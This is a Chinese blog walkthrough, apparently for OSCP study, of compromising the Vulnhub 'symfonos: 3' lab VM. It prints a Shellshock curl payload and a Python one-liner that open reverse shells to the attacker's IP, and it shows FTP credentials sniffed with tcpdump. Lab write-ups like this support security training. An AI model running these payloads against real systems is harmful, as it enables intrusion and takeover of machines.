OSCP备考_0x20_Vulnhub靶机_symfonos: 3

Ethan医生2周前靶场30


名称说明
靶机下载链接https://www.vulnhub.com/entry/symfonos-31,332/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.187


arp-scan 192.168.233.1/24

image.png

nmap -p- 192.168.233.187 


image.png


nmap -p21,22,80 -A -sV -T5 192.168.233.187


image.png


先尝试FTP无法用匿名登入

image.png

从80端口查看http://192.168.233.187/


image.png


image.png


gobuster dir -u http://192.168.233.187/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt


image.png

gobuster dir -u http://192.168.233.187/gate -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt

image.png


字典换成big ,

 gobuster dir -u http://192.168.233.187/ -w /usr/share/wordlists/dirb/big.txt  -x php,html,txt

image.png

image.png

gobuster dir -u http://192.168.233.187/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

继续往下爆破看看 

image.png

http://192.168.233.187/cgi-bin/underworld

image.png

会依照时间进行变化,查了下资料

在Linux系统中,uptime、w、top等命令都会有系统平均负载load average的输出

load average: 0.09, 0.05, 0.01

image.png

,那它有可能会有shellshock漏洞(参考资料:什么是ShellShock攻击? - 知乎),尝试一下:

curl -A "() { :;};/bin/bash -i &>/dev/tcp/192.168.233.168/6666 <&1" http://192.168.223.187/cgi-bin/underworld  ,反弹了用户cerberus

image.png


cd 到 /tmp目录下下载wget  https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

image.png

pspy 是一个开源工具,专为 Linux 系统设计,用于 监控进程启动行为(无需 root 权限),尤其擅长发现 隐藏的后台任务、定时任务(Cron)或短生命周期进程。它在渗透测试和系统排查中非常实用,以下是核心功能介绍和使用场景


image.png


image.png


image.png


可以看到靶机有提供ftp服务,而ftp服务是明文传输,所以可以尝试抓取流量包进行分析

看看主机是否有tcpdump

tcpdump --version

image.png

tcpdump -i lo -w ftp.pcap


python -m SimpleHTTPServer 7777   再把机上开启http下载

image.png

image.png

220 ProFTPD 1.3.5b Server (Debian) [::ffff:127.0.0.1]


USER hades


331 Password required for hades


PASS PTpZTfU4vxgzvRBE


230 User hades logged in


CWD /srv/ftp/


250 CWD command successful

image.png

查看一下/opt/ftpclient/ftpclient.py的内容,发现用到了ftplib.FTP

image.png

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.233.168",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

其他地方是说找寻ftplib.FTP里面去添加 但是我看ftpclient.py有权限修改直接将挡案丢入完成提权

image.png


标签: OSCP

相关文章

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-12-3,24/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.70.193 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.14.190 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.62.153 (扫描TCP)nmap -sU --top-ports 100 10.129.62....

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.143.34 (扫描TCP)nmap -sU --top-ports 100 10.129...

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.229.137 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。